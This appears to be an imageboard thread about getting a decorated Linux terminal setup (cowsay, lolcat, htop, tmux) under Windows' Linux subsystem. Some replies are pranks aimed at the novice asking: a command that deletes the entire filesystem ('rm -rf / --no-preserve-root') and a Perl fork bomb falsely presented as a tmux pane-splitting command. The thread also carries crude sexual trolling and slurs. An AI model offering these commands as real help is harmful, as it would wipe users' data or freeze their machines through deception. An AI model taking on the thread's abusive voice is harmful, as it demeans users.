How do I get this on my terminal?

how do I get this on my terminal?

Attached: linux-on-wsl.png (2444x1625, 369K)

Other urls found in this thread:

sudo rm -rf / --no-preserve-root

thanks just bought 10k

Install Gentoo

which one

fortune | cowsay
The rainbow shit is gay. I think it's called toilet, which is actually where it belongs.

The other one is htop, it's top for people who don't know how to configure top.

it's for people that value their time and don't want to spend time configuring something as basic as top*
ftfy neet

> as basic as top.
confirming he knows nothing of the power of top.


whatever neet

how the fuck do I organize it like that?

I tried to edit .bashrc but kek didn't work

First you need a program called tmux. You can install it with sudo apt-get install tmux

After you have it open you can fork it horizontally or vertically with this command: perl -e "fork while fork" &

take your penis out and begin rubbing it
keep rubbing it while you think about Richard Stallman
Keep rubbing it until you cum

Absolute fucking neet here.
Can someone briefly explain how this is running is windows?

nvm, ubuntu emu

>ubuntu emulator
No you fucking retard.
Windows 10 has had a linux kernel subsystem available for a long time. One that runs like hogshit and is basically useless, but it's there.

>Ubuntu emu

thanks just bought 100k

tmux has almost all the features of GNU screen.

Nah it's lolcat

Just install hollywood. It pulls in all that cancer and more.

Become homosexual.

>My shilling thread didn't get any replies that mentioned this is the brand new Windows terminal, I better mention it or I won't get my rupees
Notice the misuse of the term "neet"